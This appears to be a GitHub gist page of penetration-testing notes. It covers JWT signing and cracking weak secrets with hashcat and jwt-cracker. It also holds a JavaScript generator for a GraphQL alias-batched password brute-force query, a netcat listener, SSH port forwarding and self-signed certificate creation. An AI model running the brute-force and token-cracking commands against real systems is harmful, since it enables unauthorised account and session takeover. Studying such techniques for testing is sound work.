Skip to content

Instantly share code, notes, and snippets.

View sathishshan's full-sized avatar

Sathish Kumar sathishshan

4 followers · 1 following
View GitHub Profile
@sathishshan
sathishshan / jwt_token_creation.txt
Created April 13, 2024 06:26
HS256 - Signature:
echo -n "<JWT Base64url encoded - Header.Payload>" | openssl dgst -sha256 -hmac '<SECRET>' -binary | openssl base64
The output of the signature will give base64 encoding, convert that to base64url encoding
SZf1eovdqV+1mo8rvI79UxQT3Ue/mJd3ipXu8XO01os=
Change (+ to -), (/ to _), (Omit the padding == or =)
@sathishshan
sathishshan / jwt_attack.txt
Last active April 15, 2024 04:46
HS256 - Weak Signing Key: Brute Force
hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list
npm install jwt-cracker
jwt-cracker <token> [<alphabet>] [<maxLength>]
HS256 - Extracting Public Key from JWT token:
https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
@sathishshan
sathishshan / GraphQL_BruteForce_Alias.js
Last active August 30, 2024 13:04
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "<USERNAME>"}) {
token
success
}
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to
@sathishshan
sathishshan / temp_server_debug.sh
Last active May 3, 2024 14:31
while true; do nc -l localhost 8888; done
curl localhost:8888
curl -F [email protected] -F [email protected] localhost:8888
@sathishshan
sathishshan / FR-SSH_PortForwarding
Last active May 10, 2024 09:31
Remote Traffic to Localhost -> Ex: Curl to Burp
Tunnel Establishment:
ssh -fNT -R 8080:localhost:8080 username@IP
Test Run:
curl -svk https://www.google.com -x http://localhost:8080
-----------------------------------------------------------------------------------
@sathishshan
sathishshan / SAML_APP
Created May 20, 2024 13:13
Generate a certificate for the SAML app
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
Refs:
https://faq.miniorange.com/knowledgebase/can-generate-certificate-saml-app/
https://stackoverflow.com/questions/48397927/where-to-get-a-saml-certificate
https://www.samltool.com/self_signed_certs.php